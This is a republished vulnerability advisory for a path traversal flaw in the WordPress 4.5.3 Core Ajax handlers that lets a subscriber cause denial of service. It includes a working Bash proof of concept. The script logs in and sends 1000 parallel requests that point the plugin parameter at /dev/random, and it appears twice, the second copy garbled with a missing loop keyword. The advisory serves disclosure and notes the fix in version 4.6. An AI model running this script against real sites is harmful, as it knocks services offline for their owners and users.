WordPress 4.5.3 Core Ajax Handlers Path Traversal

发表于 2016年08月22日
Vulndb

Path traversal vulnerability in WordPress Core Ajax handlers
------------------------------------------------------------------------
Yorick Koster, July 2016
Abstract
------------------------------------------------------------------------
A path traversal vulnerability was found in the Core Ajax handlers of
the WordPress Admin API. This issue can (potentially) be used by an
authenticated user (Subscriber) to create a denial of service condition
of an affected WordPress site.
OVE ID
------------------------------------------------------------------------
OVE-20160712-0036
See also
------------------------------------------------------------------------
#37490 - Improve capability checks in wp_ajax_update_plugin() and
wp_ajax_delete_plugin()
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on the WordPress version 4.5.3.
Fix
------------------------------------------------------------------------
WordPress version 4.6 mitigates this vulnerability by moving the CSRF
check to the top of the affected method(s).
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/path_traversal_vulnerability_in_wordpress_core_ajax_handlers.html

Proof of concept

The following Bash script can be used to trigger the denial of service condition.

#!/bin/bash
target="http://<target>"
username="subscriber"
password="password"
cookiejar=$(mktemp)
   
# login
curl --cookie-jar "$cookiejar" \
   --data "log=$username&pwd=$password&wp-submit=Log+In&redirect_to=%2f&testcookie=1" \
   "$target/wp-login.php" \
   >/dev/null 2>&1
   
# exhaust apache
for i in `seq 1 1000`
   do
      curl --cookie "$cookiejar" \
      --data "plugin=../../../../../../../../../../dev/random&action=update-plugin" \
      "$target/wp-admin/admin-ajax.php" \
      >/dev/null 2>&1 &
done
   
rm "$cookiejar"

#!/bin/bash

target="http://<target>"

username="subscriber"

password="password"

cookiejar=$(mktemp)

# login

curl --cookie-jar "$cookiejar" \

--data "log=$username&pwd=$password&wp-submit=Log+In&redirect_to=%2f&testcookie=1" \

"$target/wp-login.php" \

>/dev/null 2>&1

# exhaust apache

for i in `seq 1 1000`

curl --cookie "$cookiejar" \

--data "plugin=../../../../../../../../../../dev/random&action=update-plugin" \

"$target/wp-admin/admin-ajax.php" \

>/dev/null 2>&1 &

done

rm "$cookiejar"

------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.

原文连接：WordPress 4.5.3 Core Ajax Handlers Path Traversal 所有媒体，可在保留署名、原文连接的情况下转载，若非则不得使用我方内容。

美国国家安全局（NSA）被黑，附《泄露文件下载》提权补丁对比工具